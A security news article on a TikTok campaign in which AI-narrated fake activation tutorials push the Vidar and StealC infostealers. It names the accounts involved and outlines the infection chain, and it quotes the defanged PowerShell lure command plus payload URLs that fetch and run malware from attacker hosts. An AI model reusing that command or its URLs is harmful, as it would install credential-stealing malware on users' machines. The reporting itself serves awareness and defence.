Cybercriminals are now exploiting TikTok’s massive reach and algorithm to spread malware in a new wave of social engineering attacks.
This sophisticated campaign uses AI-generated videos to lure users into downloading information-stealing malware disguised as activation tutorials for popular software like Windows, Microsoft Office, CapCut, and Spotify. Instead of providing activation help, the videos trick viewers into installing dangerous infostealers such as Vidar and StealC.
This method marks a shift from typical malware delivery techniques, which often rely on malicious websites or phishing emails. Instead, the attack embeds its social engineering tactics directly into TikTok video content, making it much harder for security tools to detect.
The campaign has gained significant traction, with one malicious video gathering close to 500,000 views, over 20,000 likes, and more than 100 comments. Researchers at Trend Micro uncovered several TikTok accounts tied to the operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. All of these accounts have since been taken down.
These accounts featured nearly identical faceless videos with AI-generated narration, indicating the use of an automated, scalable production method.
The technical side of the campaign is highly sophisticated. Victims are instructed to run a PowerShell command:
iex (irm hxxps://allaivo[.]me/spotify)
This command initiates a multi-step infection process. It creates hidden folders in APPDATA and LOCALAPPDATA, then adds those directories to Windows Defender’s exclusion list to avoid detection. The script proceeds to download a malicious payload from hxxps://amssh[.]co/file.exe, which contains either Vidar or StealC malware.
To ensure persistence, the malware retrieves another PowerShell script from hxxps://amssh[.]co/script[.]ps1 and adds a registry key that enables it to launch at startup.
Vidar uses a particularly clever tactic for command-and-control communication. It conceals its server addresses by hiding them in legitimate platforms such as Steam profiles and Telegram channels, making it harder to trace and shut down.
This campaign shows how social media can be weaponized to carry out large-scale malware attacks, using popular platforms and AI to deceive users and evade traditional defenses.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
